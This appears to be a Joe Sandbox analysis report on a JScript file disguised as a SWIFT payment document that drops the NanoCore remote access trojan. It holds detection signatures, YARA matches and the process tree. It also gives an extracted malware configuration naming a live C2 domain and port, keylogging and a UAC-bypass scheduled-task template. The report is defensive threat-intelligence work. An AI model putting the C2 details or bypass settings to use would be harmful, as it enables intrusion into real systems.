Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SWIFT MO104978172_1301 EURO 9700.js

Overview

General Information

Sample Name:SWIFT MO104978172_1301 EURO 9700.js
Analysis ID:796930
MD5:0d6f726c3c2a4f6e82f0ede90ba88155
SHA1:668eb996c241e10fb19c3a6ae5024309470be171
SHA256:658c78c61ac43dc28e128cd71060b2c5ab03ed241cbcd32c5a0f5a09f081a574
Tags:jsNanoCoreRAT
Infos:

Detection

Nanocore
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
JScript performs obfuscated calls to suspicious functions
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Sigma detected: NanoCore
Detected Nanocore Rat
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Yara detected Nanocore RAT
Detected unpacking (creates a PE file in dynamic memory)
Maps a DLL or memory area into another process
.NET source code contains potential unpacker
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
AV process strings found (often used to terminate AV products)
Java / VBScript file with very long strings (likely obfuscated code)
Installs a raw input device (often for capturing keystrokes)
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
JavaScript source code contains large arrays or strings with random content potentially encoding malicious code
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64
  • wscript.exe (PID: 5140 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SWIFT MO104978172_1301 EURO 9700.js" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • SWIFT MO104978172_1301 EURO 9700.exe (PID: 3396 cmdline: "C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe" MD5: E1EA8B4960D24E0E5742BBFCB3C0B240)
      • fdqkbs.exe (PID: 1368 cmdline: "C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppData\Local\Temp\rkgnewnhq.v MD5: 34037A20C292EAB6F90C3D9AB1334348)
        • fdqkbs.exe (PID: 5336 cmdline: C:\Users\user\AppData\Local\Temp\fdqkbs.exe MD5: 34037A20C292EAB6F90C3D9AB1334348)
          • fdqkbs.exe (PID: 5316 cmdline: "C:\Users\user\AppData\Local\Temp\fdqkbs.exe" MD5: 34037A20C292EAB6F90C3D9AB1334348)
            • WerFault.exe (PID: 3360 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5316 -s 624 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • syhbwgs.exe (PID: 4612 cmdline: "C:\Users\user\AppData\Roaming\tabgrjvojn\syhbwgs.exe" "C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppD MD5: 34037A20C292EAB6F90C3D9AB1334348)
    • WerFault.exe (PID: 3228 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 656 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • syhbwgs.exe (PID: 1808 cmdline: "C:\Users\user\AppData\Roaming\tabgrjvojn\syhbwgs.exe" "C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppD MD5: 34037A20C292EAB6F90C3D9AB1334348)
    • WerFault.exe (PID: 4756 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1808 -s 628 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup
{"Version": "1.2.2.0", "Mutex": "82fe3011-00e2-4a52-9361-cad1a21d", "Group": "bition1", "Domain1": "bition.duckdns.org", "Domain2": "bition.duckdns.org", "Port": 8817, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Enable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "bition.duckdns.org", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo />\r\n  <Triggers />\r\n  <Principals>\r\n    <Principal id=\"Author\">\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Priority>4</Priority>\r\n  </Settings>\r\n  <Actions Context=\"Author\">\r\n    <Exec>\r\n      <Command>\"#EXECUTABLEPATH\"</Command>\r\n      <Arguments>$(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task"}
SourceRuleDescriptionAuthorStrings
00000003.00000002.279567061.0000000000608000.00000004.00000020.00020000.00000000.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth (Nextron Systems)
  • 0x2c26d:$x1: NanoCore.ClientPluginHost
  • 0x2c2aa:$x2: IClientNetworkHost
  • 0x2fddd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000003.00000002.279567061.0000000000608000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
    00000003.00000002.279567061.0000000000608000.00000004.00000020.00020000.00000000.sdmpNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
    • 0x3148:$a: NanoCore
    • 0x2bfd5:$a: NanoCore
    • 0x2bfe5:$a: NanoCore
    • 0x2c219:$a: NanoCore
    • 0x2c22d:$a: NanoCore
    • 0x2c26d:$a: NanoCore
    • 0x2c034:$b: ClientPlugin
    • 0x2c236:$b: ClientPlugin
    • 0x2c276:$b: ClientPlugin
    • 0x2c15b:$c: ProjectData
    • 0x2cb62:$d: DESCrypto
    • 0x3452e:$e: KeepAlive
    • 0x3251c:$g: LogClientMessage
    • 0x2e717:$i: get_Connected
    • 0x2ce98:$j: #=q
    • 0x2cec8:$j: #=q
    • 0x2cee4:$j: #=q
    • 0x2cf14:$j: #=q
    • 0x2cf30:$j: #=q
    • 0x2cf4c:$j: #=q
    • 0x2cf7c:$j: #=q
    00000003.00000002.279567061.0000000000608000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Nanocore_d8c4e3c5unknownunknown
    • 0x2c26d:$a1: NanoCore.ClientPluginHost
    • 0x2c22d:$a2: NanoCore.ClientPlugin
    • 0x2e186:$b1: get_BuilderSettings
    • 0x2c089:$b2: ClientLoaderForm.resources
    • 0x2d8a6:$b3: PluginCommand
    • 0x2c25e:$b4: IClientAppHost
    • 0x366de:$b5: GetBlockHash
    • 0x2e7de:$b6: AddHostEntry
    • 0x324d1:$b7: LogClientException
    • 0x2e74b:$b8: PipeExists
    • 0x2c297:$b9: IClientLoggingHost
    00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth (Nextron Systems)
    • 0x121e5:$x1: NanoCore.ClientPluginHost
    • 0x12222:$x2: IClientNetworkHost
    • 0x15d55:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
    Click to see the 26 entries
    SourceRuleDescriptionAuthorStrings
    3.2.fdqkbs.exe.417058.0.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth (Nextron Systems)
    • 0x1018d:$x1: NanoCore.ClientPluginHost
    • 0x101ca:$x2: IClientNetworkHost
    • 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
    3.2.fdqkbs.exe.417058.0.raw.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth (Nextron Systems)
    • 0xff05:$x1: NanoCore Client.exe
    • 0x1018d:$x2: NanoCore.ClientPluginHost
    • 0x117c6:$s1: PluginCommand
    • 0x117ba:$s2: FileCommand
    • 0x1266b:$s3: PipeExists
    • 0x18422:$s4: PipeCreated
    • 0x101b7:$s5: IClientLoggingHost
    3.2.fdqkbs.exe.417058.0.raw.unpackJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
      3.2.fdqkbs.exe.417058.0.raw.unpackMALWARE_Win_NanoCoreDetects NanoCoreditekSHen
      • 0xfef5:$x1: NanoCore Client
      • 0xff05:$x1: NanoCore Client
      • 0x1014d:$x2: NanoCore.ClientPlugin
      • 0x1018d:$x3: NanoCore.ClientPluginHost
      • 0x10142:$i1: IClientApp
      • 0x10163:$i2: IClientData
      • 0x1016f:$i3: IClientNetwork
      • 0x1017e:$i4: IClientAppHost
      • 0x101a7:$i5: IClientDataHost
      • 0x101b7:$i6: IClientLoggingHost
      • 0x101ca:$i7: IClientNetworkHost
      • 0x101dd:$i8: IClientUIHost
      • 0x101eb:$i9: IClientNameObjectCollection
      • 0x10207:$i10: IClientReadOnlyNameObjectCollection
      • 0xff54:$s1: ClientPlugin
      • 0x10156:$s1: ClientPlugin
      • 0x1064a:$s2: EndPoint
      • 0x10653:$s3: IPAddress
      • 0x1065d:$s4: IPEndPoint
      • 0x12093:$s6: get_ClientSettings
      • 0x12637:$s7: get_Connected
      3.2.fdqkbs.exe.417058.0.raw.unpackNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
      • 0xfef5:$a: NanoCore
      • 0xff05:$a: NanoCore
      • 0x10139:$a: NanoCore
      • 0x1014d:$a: NanoCore
      • 0x1018d:$a: NanoCore
      • 0xff54:$b: ClientPlugin
      • 0x10156:$b: ClientPlugin
      • 0x10196:$b: ClientPlugin
      • 0x1007b:$c: ProjectData
      • 0x10a82:$d: DESCrypto
      • 0x1844e:$e: KeepAlive
      • 0x1643c:$g: LogClientMessage
      • 0x12637:$i: get_Connected
      • 0x10db8:$j: #=q
      • 0x10de8:$j: #=q
      • 0x10e04:$j: #=q
      • 0x10e34:$j: #=q
      • 0x10e50:$j: #=q
      • 0x10e6c:$j: #=q
      • 0x10e9c:$j: #=q
      • 0x10eb8:$j: #=q
      Click to see the 80 entries

      AV Detection

      barindex
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\fdqkbs.exe, ProcessId: 5336, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

      E-Banking Fraud

      barindex
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\fdqkbs.exe, ProcessId: 5336, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

      Stealing of Sensitive Information

      barindex
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\fdqkbs.exe, ProcessId: 5336, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

      Remote Access Functionality

      barindex
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\fdqkbs.exe, ProcessId: 5336, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
      No Snort rule has matched

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: SWIFT MO104978172_1301 EURO 9700.jsReversingLabs: Detection: 46%
      Source: SWIFT MO104978172_1301 EURO 9700.jsAvira: detected
      Source: bition.duckdns.orgAvira URL Cloud: Label: malware
      Source: Yara matchFile source: 3.2.fdqkbs.exe.417058.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.fdqkbs.exe.400000.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.fdqkbs.exe.417058.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.fdqkbs.exe.2480000.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.fdqkbs.exe.34e5530.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.fdqkbs.exe.35631e4.8.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.fdqkbs.exe.356780d.7.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.fdqkbs.exe.4910000.9.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.fdqkbs.exe.2480000.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.fdqkbs.exe.6240e0.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.fdqkbs.exe.35631e4.8.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.fdqkbs.exe.6240e0.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.fdqkbs.exe.34e5530.6.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.fdqkbs.exe.355e3ae.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000003.00000002.279567061.0000000000608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.290934640.0000000002480000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.292248425.0000000004912000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.291265267.000000000351C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.291265267.00000000034E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: fdqkbs.exe PID: 5336, type: MEMORYSTR
      Source: C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exeJoe Sandbox ML: detected
      Source: 3.2.fdqkbs.exe.400000.1.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: 0.3.wscript.exe.2c17141e8b0.0.unpackAvira: Label: TR/Patched.Ren.Gen
      Source: 3.2.fdqkbs.exe.4910000.9.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: 0.2.wscript.exe.2c1743a0090.0.unpackAvira: Label: TR/Patched.Ren.Gen
      Source: 00000003.00000002.291265267.000000000351C000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "82fe3011-00e2-4a52-9361-cad1a21d", "Group": "bition1", "Domain1": "bition.duckdns.org", "Domain2": "bition.duckdns.org", "Port": 8817, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Enable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "bition.duckdns.org", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n <RegistrationInfo />\r\n <Triggers />\r\n <Principals>\r\n <Principal id=\"Author\">\r\n <LogonType>InteractiveToken</LogonType>\r\n <RunLevel>HighestAvailable</RunLevel>\r\n </Principal>\r\n </Principals>\r\n <Settings>\r\n <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n <AllowHardTerminate>true</AllowHardTerminate>\r\n <StartWhenAvailable>false</StartWhenAvailable>\r\n <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n <IdleSettings>\r\n <StopOnIdleEnd>false</StopOnIdleEnd>\r\n <RestartOnIdle>false</RestartOnIdle>\r\n </IdleSettings>\r\n <AllowStartOnDemand>true</AllowStartOnDemand>\r\n <Enabled>true</Enabled>\r\n <Hidden>false</Hidden>\r\n <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n <WakeToRun>false</WakeToRun>\r\n <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n <Priority>4</Priority>\r\n </Settings>\r\n <Actions Context=\"Author\">\r\n <Exec>\r\n <Command>\"#EXECUTABLEPATH\"</Command>\r\n <Arguments>$(Arg0)</Arguments>\r\n </Exec>\r\n </Actions>\r\n</Task"}

      Compliance

      barindex
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeUnpacked PE file: 3.2.fdqkbs.exe.4910000.9.unpack
      Source: Binary string: C:\xampp\htdocs\ab320849c3d04f77b5cc7477929d7dcb\Loader\Release\Loader.pdb source: SWIFT MO104978172_1301 EURO 9700.exe, 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmp, SWIFT MO104978172_1301 EURO 9700.exe, 00000001.00000002.275512291.000000000283E000.00000004.00000020.00020000.00000000.sdmp, fdqkbs.exe, 00000002.00000002.270678669.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, fdqkbs.exe, 00000002.00000002.270350448.0000000000410000.00000002.00000001.01000000.00000007.sdmp, fdqkbs.exe, 00000002.00000000.257316994.0000000000410000.00000002.00000001.01000000.00000007.sdmp, fdqkbs.exe, 00000003.00000000.260606717.0000000000410000.00000002.00000001.01000000.00000007.sdmp, fdqkbs.exe, 00000008.00000000.278941376.0000000000410000.00000002.00000001.01000000.00000007.sdmp, fdqkbs.exe, 00000008.00000002.297962991.0000000000410000.00000002.00000001.01000000.00000007.sdmp, syhbwgs.exe, 0000000B.00000002.298205955.0000000000410000.00000002.00000001.01000000.0000000B.sdmp, syhbwgs.exe, 0000000B.00000000.286300116.0000000000410000.00000002.00000001.01000000.0000000B.sdmp, syhbwgs.exe, 00000015.00000002.314785679.0000000000410000.00000002.00000001.01000000.0000000B.sdmp, syhbwgs.exe, 00000015.00000000.308154727.0000000000410000.00000002.00000001.01000000.0000000B.sdmp, fdqkbs.exe.1.dr, nse2F03.tmp.1.dr, syhbwgs.exe.2.dr
      Source: Binary string: wntdll.pdbUGP source: fdqkbs.exe, 00000002.00000003.265726648.000000001A460000.00000004.00001000.00020000.00000000.sdmp, fdqkbs.exe, 00000002.00000003.262758217.000000001A5F0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: fdqkbs.exe, 00000002.00000003.265726648.000000001A460000.00000004.00001000.00020000.00000000.sdmp, fdqkbs.exe, 00000002.00000003.262758217.000000001A5F0000.00000004.00001000.00020000.00000000.sdmp
      Source: C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exeCode function: 1_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,1_2_00405D74
      Source: C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exeCode function: 1_2_0040699E FindFirstFileW,FindClose,1_2_0040699E
      Source: C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exeCode function: 1_2_0040290B FindFirstFileW,1_2_0040290B
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeCode function: 3_2_00406715 FindFirstFileExW,3_2_00406715

      Networking

      barindex
      Source: Malware configuration extractorURLs: bition.duckdns.org
      Source: wscript.exe, 00000000.00000003.255882496.000002C17141E000.00000004.00000020.00020000.00000000.sdmp, SWIFT MO104978172_1301 EURO 9700.exe, 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmp, SWIFT MO104978172_1301 EURO 9700.exe, 00000001.00000000.255759037.000000000040A000.00000008.00000001.01000000.00000006.sdmp, SWIFT MO104978172_1301 EURO 9700.exe.0.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: fdqkbs.exe, 00000003.00000002.291187463.0000000002530000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: Amcache.hve.12.drString found in binary or memory: http://upx.sf.net
      Source: syhbwgs.exe, 0000000B.00000002.298260544.00000000007BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
      Source: fdqkbs.exe, 00000003.00000002.291265267.000000000351C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: RegisterRawInputDevices
      Source: C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exeCode function: 1_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,1_2_00405809

      E-Banking Fraud

      barindex
      Source: Yara matchFile source: 3.2.fdqkbs.exe.417058.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.fdqkbs.exe.400000.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.fdqkbs.exe.417058.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.fdqkbs.exe.2480000.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.fdqkbs.exe.34e5530.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.fdqkbs.exe.35631e4.8.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.fdqkbs.exe.356780d.7.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.fdqkbs.exe.4910000.9.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.fdqkbs.exe.2480000.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.fdqkbs.exe.6240e0.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.fdqkbs.exe.35631e4.8.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.fdqkbs.exe.6240e0.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.fdqkbs.exe.34e5530.6.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.fdqkbs.exe.355e3ae.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000003.00000002.279567061.0000000000608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.290934640.0000000002480000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.292248425.0000000004912000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.291265267.000000000351C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.291265267.00000000034E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: fdqkbs.exe PID: 5336, type: MEMORYSTR

      System Summary

      barindex
      Source: 3.2.fdqkbs.exe.417058.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 3.2.fdqkbs.exe.417058.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 3.2.fdqkbs.exe.417058.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 3.2.fdqkbs.exe.417058.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 3.2.fdqkbs.exe.254bb40.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 3.2.fdqkbs.exe.254bb40.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 3.2.fdqkbs.exe.254bb40.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 3.2.fdqkbs.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 3.2.fdqkbs.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 3.2.fdqkbs.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 3.2.fdqkbs.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 3.2.fdqkbs.exe.417058.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 3.2.fdqkbs.exe.417058.0.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 3.2.fdqkbs.exe.417058.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 3.2.fdqkbs.exe.417058.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 3.2.fdqkbs.exe.2480000.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 3.2.fdqkbs.exe.2480000.3.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 3.2.fdqkbs.exe.2480000.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 3.2.fdqkbs.exe.2480000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 3.2.fdqkbs.exe.34e5530.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 3.2.fdqkbs.exe.34e5530.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 3.2.fdqkbs.exe.34e5530.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 3.2.fdqkbs.exe.34e5530.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 3.2.fdqkbs.exe.35631e4.8.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 3.2.fdqkbs.exe.35631e4.8.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 3.2.fdqkbs.exe.35631e4.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
